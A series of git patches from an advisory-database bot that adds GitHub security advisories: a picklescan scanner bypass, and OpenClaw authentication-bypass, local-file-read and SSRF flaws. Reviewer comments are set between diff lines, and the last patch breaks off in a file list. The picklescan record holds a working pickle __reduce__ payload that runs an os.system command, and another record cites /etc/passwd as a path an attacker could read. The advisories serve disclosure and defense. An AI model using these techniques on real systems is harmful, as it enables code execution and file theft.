+ "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "openclaw"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2026.2.14"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jfv4-h8mc-jcp8"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/commit/6084d13b956119e3cf95daaf9a1cae1670ea3557"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/commit/eb60e2e1b213740c3c587a7ba4dbf10da620ca66"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/openclaw/openclaw"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-283"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-18T17:41:09Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
From 600a0a3c8cbe3424156c908e73c8eebb9b38af90 Mon Sep 17 00:00:00 2001
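Review bot: The `details` string of GHSA-jfv4-h8mc-jcp8 still ends with the maintainers' `## Release Process Note` section ("After `2026.2.14` is published to npm, the remaining step should be to publish this advisory"), which is publishing workflow text rather than advisory content and reads as if the fix were not yet available. The same record already lists `https://github.com/openclaw/openclaw/releases/tag/v2026.2.14` under `references`, so I would drop that section and remove "(planned next release)" from the `Fixed:` bullet. The GHSA-4564-pvr2-qq4h and GHSA-rwj8-p9vq-25gv records in this series carry the same kind of wording ("(next release)", "(planned)") next to a `fixed` event of `2026.2.14`.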
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com>
Date: Wed, 18 Feb 2026 17:46:16 +0000
Subject: [PATCH 012/174] Publish Advisories GHSA-97f8-7cmv-76j2 GHSA-h9g4-589h-68xv GHSA-rwj8-p9vq-25gv GHSA-x22m-j5qq-j49m
---
.../GHSA-97f8-7cmv-76j2.json | 59 +++++++++++++++
.../GHSA-h9g4-589h-68xv.json | 71 +++++++++++++++++++
.../GHSA-rwj8-p9vq-25gv.json | 67 +++++++++++++++++
.../GHSA-x22m-j5qq-j49m.json | 67 +++++++++++++++++
4 files changed, 264 insertions(+)
create mode 100644 advisories/github-reviewed/2026/02/GHSA-97f8-7cmv-76j2/GHSA-97f8-7cmv-76j2.json
create mode 100644 advisories/github-reviewed/2026/02/GHSA-h9g4-589h-68xv/GHSA-h9g4-589h-68xv.json
create mode 100644 advisories/github-reviewed/2026/02/GHSA-rwj8-p9vq-25gv/GHSA-rwj8-p9vq-25gv.json
create mode 100644 advisories/github-reviewed/2026/02/GHSA-x22m-j5qq-j49m/GHSA-x22m-j5qq-j49m.json
diff --git a/advisories/github-reviewed/2026/02/GHSA-97f8-7cmv-76j2/GHSA-97f8-7cmv-76j2.json b/advisories/github-reviewed/2026/02/GHSA-97f8-7cmv-76j2/GHSA-97f8-7cmv-76j2.json
new file mode 100644
index 0000000000000..b8af51a354c0f
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-97f8-7cmv-76j2/GHSA-97f8-7cmv-76j2.json
@@ -0,0 +1,59 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-97f8-7cmv-76j2",
+ "modified": "2026-02-18T17:45:52Z",
+ "published": "2026-02-18T17:45:52Z",
+ "aliases": [],
+ "summary": "Picklescan (scan_pytorch) Bypass via dynamic eval MAGIC_NUMBER",
+ "details": "### Summary\nThis is a scanning bypass to `scan_pytorch` function in `picklescan`. As we can see in the implementation of [get_magic_number()](https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/torch.py#L76C5-L84) that uses `pickletools.genops(data)` to get the `magic_number` with the condition `opcode.name` includes `INT` or `LONG`, but the PyTorch's implemtation simply uses [pickle_module.load()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1797) to get this `magic_number`. For this implementation difference, we then can embed the `magic_code` into the `PyTorch` file via dynamic `eval` on the `\\_\\_reduce\\_\\_` trick, which can make the `pickletools.genops(data)` cannot get the `magic_code` in `INT` or `LONG` type, but the `pickle_module.load()` can still return the same `magic_code`, eading to a bypass.\n\n### PoC\n#### Attack Step 1\nwe can edit the source code of the function [\\_legacy\\_save()](https://github.com/pytorch/pytorch/blob/134179474539648ba7dee1317959529fbd0e7f89/torch/serialization.py#L1120) as follows:\n```Python\n class payload:\n def __reduce__(self):\n return (eval, ('MAGIC_NUMBER',))\n\n pickle_module.dump(payload(), f, protocol=pickle_protocol)\n```\n#### Attack Step 2\nwith the modified version of `PyTorch`, we run the following PoC to generate the `payload.pt`:\n```Python\nimport torch \n\nclass payload:\n def __reduce__(self):\n return (__import__('os').system, ('touch /tmp/hacked',))\n\ntorch.save(payload(), './payload.pt', _use_new_zipfile_serialization = False)\n```\n\n#### Picklescan result\n```\nERROR: Invalid magic number for file /home/pzhou/bug-bunty/pytorch/PoC/payload.pt: None != 119547037146038801333356\n----------- SCAN SUMMARY -----------\nScanned files: 0\nInfected files: 0\nDangerous globals: 0\n```\n\n#### Victim Step\n```Python\nimport torch\ntorch.load('./payload.pt', weights_only=False)\n```\nthen you can find the illegal file `/tmp/hacked` created in your local system.\n\n### Impact\nCraft malicious `PyTorch` payloads to bypass `picklescan`, then recall ACE/RCE.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "picklescan"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.0.3"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-97f8-7cmv-76j2"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/mmaitre314/picklescan/commit/b9997634683a4f4bd0c7e3701e7ce7e90fe70e8c"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/mmaitre314/picklescan"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-184"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-18T17:45:52Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-h9g4-589h-68xv/GHSA-h9g4-589h-68xv.json b/advisories/github-reviewed/2026/02/GHSA-h9g4-589h-68xv/GHSA-h9g4-589h-68xv.json
new file mode 100644
index 0000000000000..5b9c08f0000c3
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-h9g4-589h-68xv/GHSA-h9g4-589h-68xv.json
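Review bot: The `details` of GHSA-97f8-7cmv-76j2 stop at `### Impact` and give defenders no remediation, although the record's own range marks `1.0.3` as the fixed release. The quoted scanner output is the part to act on: the run ends with an `ERROR: Invalid magic number` line and `Scanned files: 0`, so a pipeline that gates only on `Infected files: 0` would presumably accept a file that was never scanned. I would append a short `### Remediation` section saying to upgrade picklescan to `1.0.3`, to treat a scan error or a zero scanned-file count as a failed scan, and to load untrusted checkpoints with `weights_only=True`. The prose also has typos worth fixing in the same pass (`implemtation`, `eading to a bypass`).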
@@ -0,0 +1,71 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h9g4-589h-68xv",
+ "modified": "2026-02-18T17:45:31Z",
+ "published": "2026-02-18T17:45:31Z",
+ "aliases": [],
+ "summary": "OpenClaw has an authentication bypass in sandbox browser bridge server",
+ "details": "## Summary\n\nopenclaw could start the sandbox browser bridge server without authentication.\n\nWhen the sandboxed browser is enabled, openclaw runs a local (loopback) HTTP bridge that exposes browser control endpoints (for example `/profiles`, `/tabs`, `/tabs/open`, `/agent/*`). Due to missing auth wiring in the sandbox initialization path, that bridge server accepted requests without requiring gateway auth.\n\n## Impact\n\nA local attacker (any process on the same machine) could access the bridge server port and:\n\n- enumerate open tabs and retrieve CDP WebSocket URLs\n- open/close/navigate tabs\n- execute JavaScript in page contexts via CDP\n- exfiltrate cookies/session data and page contents from authenticated sessions\n\nThis is a localhost-only exposure (CVSS AV:L), but provides full browser-session compromise for sandboxed browser usage.\n\n## Affected Versions\n\n- Introduced in: `2026.1.29-beta.1` (first npm release that shipped the sandbox browser bridge)\n- Affected range: `>=2026.1.29-beta.1 <2026.2.14`\n\n## Patched Versions\n\n- `2026.2.14`\n\n## Mitigation\n\n- Upgrade to `2026.2.14` (recommended).\n- Or disable the sandboxed browser (`agents.defaults.sandbox.browser.enabled=false`).\n\n## Fix Details\n\n- The sandbox browser bridge server now always requires auth and enforces the same gateway browser control auth (token/password) that loopback browser clients already use.\n- Additional hardening: bridge server refuses non-loopback binds; local helper servers are bound to loopback.\n- Added regression tests (including unit coverage for per-port bridge auth fallback).\n\nFix commits:\n\n- openclaw/openclaw@4711a943e30bc58016247152ba06472dab09d0b0\n- openclaw/openclaw@6dd6bce997c48752134f2d6ed89b27de01ced7e3\n- openclaw/openclaw@cd84885a4ac78eadb7bf321aae98db9519426d67\n## Credits\n\nThanks to Adnan Jakati (@jackhax) of [Praetorian](https://www.praetorian.com/) for reporting this issue.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "openclaw"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2026.1.29-beta.1"
+ },
+ {
+ "fixed": "2026.2.14"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h9g4-589h-68xv"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/commit/4711a943e30bc58016247152ba06472dab09d0b0"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/commit/6dd6bce997c48752134f2d6ed89b27de01ced7e3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/commit/cd84885a4ac78eadb7bf321aae98db9519426d67"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/openclaw/openclaw"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-306"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-18T17:45:31Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-rwj8-p9vq-25gv/GHSA-rwj8-p9vq-25gv.json b/advisories/github-reviewed/2026/02/GHSA-rwj8-p9vq-25gv/GHSA-rwj8-p9vq-25gv.json
new file mode 100644
index 0000000000000..643dd48b64b4f
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-rwj8-p9vq-25gv/GHSA-rwj8-p9vq-25gv.json
@@ -0,0 +1,67 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rwj8-p9vq-25gv",
+ "modified": "2026-02-18T17:44:58Z",
+ "published": "2026-02-18T17:44:58Z",
+ "aliases": [],
+ "summary": "OpenClaw has a LFI in BlueBubbles media path handling",
+ "details": "### Summary\nThe BlueBubbles extension accepted attacker-controlled local filesystem paths via `mediaPath` and could read arbitrary local files from disk before sending them as media attachments.\n\n### Details\nWhen `sendBlueBubblesMedia` received a non-HTTP media source, the previous implementation resolved it to a local path and read it directly from disk. There was no required allowlist of safe directories, so values like `/etc/passwd` (or equivalent sensitive paths on other platforms) could be requested and exfiltrated.\n\nThe fix hardens local media loading by requiring explicit configured roots (`channels.bluebubbles.mediaLocalRoots`) and by enforcing canonical-path containment checks before reading local files. Paths outside allowed roots are rejected.\n\nFix PR: https://github.com/openclaw/openclaw/pull/16322\nFix commit: https://github.com/openclaw/openclaw/commit/71f357d9498cebb0efe016b0496d5fbe807539fc\n\n### Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< v2026.2.14`\n- Fixed: `>= v2026.2.14` (planned)\n\n### Impact\nAn attacker able to trigger BlueBubbles media sends could exfiltrate local files accessible to the OpenClaw process.\n\n### Remediation\nUpgrade to a release that includes commit `71f357d9498cebb0efe016b0496d5fbe807539fc` and configure `channels.bluebubbles.mediaLocalRoots` to explicit trusted directories.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "openclaw"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2026.2.14"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rwj8-p9vq-25gv"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/pull/16322"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/commit/71f357d9498cebb0efe016b0496d5fbe807539fc"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/openclaw/openclaw"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-18T17:44:58Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2026/02/GHSA-x22m-j5qq-j49m/GHSA-x22m-j5qq-j49m.json b/advisories/github-reviewed/2026/02/GHSA-x22m-j5qq-j49m/GHSA-x22m-j5qq-j49m.json
new file mode 100644
index 0000000000000..f469774848c76
--- /dev/null
+++ b/advisories/github-reviewed/2026/02/GHSA-x22m-j5qq-j49m/GHSA-x22m-j5qq-j49m.json
@@ -0,0 +1,67 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-x22m-j5qq-j49m",
+ "modified": "2026-02-18T17:45:12Z",
+ "published": "2026-02-18T17:45:12Z",
+ "aliases": [],
+ "summary": "OpenClaw has two SSRF via sendMediaFeishu and markdown image fetching in Feishu extension",
+ "details": "### Summary\nThe Feishu extension could fetch attacker-controlled remote URLs in two paths without SSRF protections:\n\n- `sendMediaFeishu(mediaUrl)`\n- Feishu DocX markdown image URLs (write/append -> image processing)\n\n### Affected versions\n- `< 2026.2.14`\n\n### Patched versions\n- `>= 2026.2.14`\n\n### Impact\nIf an attacker can influence tool calls (directly or via prompt injection), they may be able to trigger requests to internal services and re-upload the response as Feishu media.\n\n### Remediation\nUpgrade to OpenClaw `2026.2.14` or newer.\n\n### Notes\nThe fix routes Feishu remote media fetching through hardened runtime helpers that enforce SSRF policies and size limits.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "openclaw"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2026.2.14"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x22m-j5qq-j49m"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/pull/16285"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/commit/5b4121d6011a48c71e747e3c18197f180b872c5d"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/openclaw/openclaw"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-918"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2026-02-18T17:45:12Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
From 51aad82d6223f946c3a0f0dab3ff2852d7b143a9 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com>
Date: Wed, 18 Feb 2026 17:48:30 +0000
Subject: [PATCH 013/174] Publish GHSA-6xw9-2p64-7622
---
.../GHSA-6xw9-2p64-7622.json | 37 +++++++++++++++----
1 file changed, 29 insertions(+), 8 deletions(-)
rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json (70%)
diff --git a/advisories/unreviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json b/advisories/github-reviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json
similarity index 70%
rename from advisories/unreviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json
rename to advisories/github-reviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json
index fad76fe75e122..4b5c170ad0b05 100644
--- a/advisories/unreviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json
+++ b/advisories/github-reviewed/2026/02/GHSA-6xw9-2p64-7622/GHSA-6xw9-2p64-7622.json
@@ -1,12 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-6xw9-2p64-7622", - "modified": "2026-02-16T06:31:29Z", + "modified": "2026-02-18T17:47:09Z", "published": "2026-02-16T06:31:29Z", "aliases": [ "CVE-2026-2531" ], - "details": "A security vulnerability has been detected in MindsDB up to 25.14.1. This vulnerability affects the function clear_filename of the file mindsdb/utilities/security.py of the component File Upload. Such manipulation leads to server-side request forgery. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The name of the patch is 74d6f0fd4b630218519a700fbee1c05c7fd4b1ed. It is best practice to apply a patch to resolve this issue.", + "summary": "MindsDB affected by a SSRF vulnerability", + "details": "A security vulnerability has been detected in MindsDB up to 25.14.1. This vulnerability affects the function clear_filename of the file mindsdb/utilities/security.py of the component File Upload. Such manipulation leads to server-side request forgery. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.", "severity": [ { "type": "CVSS_V3", @@ -14,10 +15,30 @@ }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "MindsDB" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "25.14.1" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -36,7 +57,7 @@ "url": "https://github.com/themavik/mindsdb/commit/74d6f0fd4b630218519a700fbee1c05c7fd4b1ed" }, { - "type": "WEB", + "type": "PACKAGE", "url": "https://github.com/mindsdb/mindsdb" }, { 
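Review bot: The new `affected` entry for GHSA-6xw9-2p64-7622 names the package `"MindsDB"` under the `PyPI` ecosystem, but the OSV schema expects the normalized PyPI name, so a consumer that matches package names case-sensitively may not associate this record with installed `mindsdb`; I would write `"name": "mindsdb"`. The range also closes with `"last_affected": "25.14.1"` rather than a `fixed` event, and the only patch commit visible in the references sits under `github.com/themavik/mindsdb`, not the `mindsdb/mindsdb` repository this change marks as `PACKAGE`. If no upstream release contains the fix yet, that is worth saying in `details`, since the same hunk removes the sentence that named the patch.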
@@ -56,9 +77,9 @@ "cwe_ids": [ "CWE-918" ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:47:09Z", "nvd_published_at": "2026-02-16T04:15:51Z" } } \ No newline at end of file From 5b7321cdfff9966c097a7ed8b37fd1220badb3b3 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 18:32:01 +0000 Subject: [PATCH 014/174] Advisory Database Sync --- .../GHSA-4gm2-v7j4-74p8.json | 13 ++- .../GHSA-2764-3pqr-49w6.json | 3 +- .../GHSA-9cmp-2g73-ff98.json | 1 + .../GHSA-qhp7-446p-xq88.json | 1 + .../GHSA-xr9j-c7v6-7542.json | 1 + .../GHSA-v727-f437-6cxx.json | 1 + .../GHSA-prhq-c3gx-jhwg.json | 3 +- .../GHSA-2whf-r4r4-c662.json | 2 +- .../GHSA-365g-rr2h-rx65.json | 37 +++++++ .../GHSA-3cgw-cpcx-p7g4.json | 4 +- .../GHSA-3w2g-4qx3-2mmw.json | 41 ++++++++ .../GHSA-4mcw-fcqm-vqg3.json | 56 +++++++++++ .../GHSA-4v8p-q39m-4pj8.json | 36 +++++++ .../GHSA-4vmx-r9fj-4cm5.json | 36 +++++++ .../GHSA-55vh-w3p8-qq9g.json | 33 +++++++ .../GHSA-5jgq-pv8m-5cx7.json | 33 +++++++ .../GHSA-5pqm-c33h-22jc.json | 33 +++++++ .../GHSA-5q5x-wqxc-vv25.json | 40 ++++++++ .../GHSA-5qf3-3gp9-pjx6.json | 41 ++++++++ .../GHSA-5qq8-6gv4-wmcc.json | 36 +++++++ .../GHSA-636r-hfj8-v9m7.json | 6 +- .../GHSA-64jv-v62f-2xrg.json | 36 +++++++ .../GHSA-6rjp-j8mc-4f57.json | 60 ++++++++++++ .../GHSA-6xrx-3vj8-2rjc.json | 33 +++++++ .../GHSA-74jq-6q38-p5wf.json | 1 + .../GHSA-74rw-28vp-8wh9.json | 6 +- .../GHSA-78xc-39m5-v2c6.json | 37 +++++++ .../GHSA-7fjm-558r-4j8r.json | 38 ++++++++ .../GHSA-7p94-766c-hgjp.json | 36 +++++++ .../GHSA-85h6-5m3v-gx37.json | 15 ++- .../GHSA-876r-52fj-4pxf.json | 41 ++++++++ .../GHSA-8j5g-3q2r-xfjh.json | 37 +++++++ .../GHSA-8rh3-rvv2-3mr4.json | 3 +- .../GHSA-8rqj-9226-cwx7.json | 33 +++++++ .../GHSA-9pjv-cqr5-4xh7.json | 96 +++++++++++++++++++ .../GHSA-9wwr-2jh3-482p.json | 41 ++++++++ .../GHSA-c56r-fcf4-6rp2.json | 10 +- .../GHSA-chpq-fr33-gp2m.json | 40 ++++++++ .../GHSA-f2fg-5m3g-hqwv.json | 36 +++++++ .../GHSA-f5pv-9whq-7mv7.json | 36 +++++++ .../GHSA-f7cx-4c4g-9g59.json | 6 +- .../GHSA-f7pj-q7w5-89fg.json | 41 ++++++++ .../GHSA-fqrv-m9rv-j33j.json | 36 +++++++ .../GHSA-g3vh-wfh4-fp76.json | 33 +++++++ .../GHSA-g4wf-v389-9w53.json | 2 +- 
.../GHSA-h437-rr98-fx56.json | 37 +++++++ .../GHSA-hcrc-x9p4-f9jh.json | 38 ++++++++ .../GHSA-hxp3-qj63-m9j9.json | 4 +- .../GHSA-j6h2-wr53-6vcg.json | 41 ++++++++ .../GHSA-j87r-wgfm-7fjj.json | 41 ++++++++ .../GHSA-jggw-c47g-3w3q.json | 6 +- .../GHSA-jp99-8xc8-367m.json | 33 +++++++ .../GHSA-m34c-wrf8-mw69.json | 41 ++++++++ .../GHSA-m4f3-qp2w-gwh6.json | 40 ++++++++ .../GHSA-m4v3-95xp-3j5h.json | 33 +++++++ .../GHSA-mc8x-4j6m-qj3r.json | 6 +- .../GHSA-mx4x-pxgm-r77w.json | 37 +++++++ .../GHSA-p525-h9pq-233r.json | 29 ++++++ .../GHSA-p68h-c56f-p3v6.json | 41 ++++++++ .../GHSA-q5q3-fgwr-rr9h.json | 4 +- .../GHSA-v3v9-r7ff-976x.json | 33 +++++++ .../GHSA-v9g2-54rr-mxmg.json | 4 +- .../GHSA-w35p-gjc5-2g6r.json | 44 +++++++++ .../GHSA-w94g-pmcx-r454.json | 41 ++++++++ .../GHSA-wfhp-qgm8-5p5c.json | 15 ++- .../GHSA-wp4v-6rrv-wqv9.json | 4 +- .../GHSA-wxwg-9693-mqg4.json | 4 +- .../GHSA-xfjv-gcf8-3jqc.json | 6 +- .../GHSA-xw73-fccw-fgc4.json | 36 +++++++ .../GHSA-xw8j-p597-rjrj.json | 4 +- 70 files changed, 1803 insertions(+), 29 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4mcw-fcqm-vqg3/GHSA-4mcw-fcqm-vqg3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4vmx-r9fj-4cm5/GHSA-4vmx-r9fj-4cm5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5q5x-wqxc-vv25/GHSA-5q5x-wqxc-vv25.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json 
create mode 100644 advisories/unreviewed/2026/02/GHSA-5qq8-6gv4-wmcc/GHSA-5qq8-6gv4-wmcc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-64jv-v62f-2xrg/GHSA-64jv-v62f-2xrg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6rjp-j8mc-4f57/GHSA-6rjp-j8mc-4f57.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7fjm-558r-4j8r/GHSA-7fjm-558r-4j8r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7p94-766c-hgjp/GHSA-7p94-766c-hgjp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9pjv-cqr5-4xh7/GHSA-9pjv-cqr5-4xh7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-chpq-fr33-gp2m/GHSA-chpq-fr33-gp2m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f2fg-5m3g-hqwv/GHSA-f2fg-5m3g-hqwv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f5pv-9whq-7mv7/GHSA-f5pv-9whq-7mv7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fqrv-m9rv-j33j/GHSA-fqrv-m9rv-j33j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json create mode 100644 
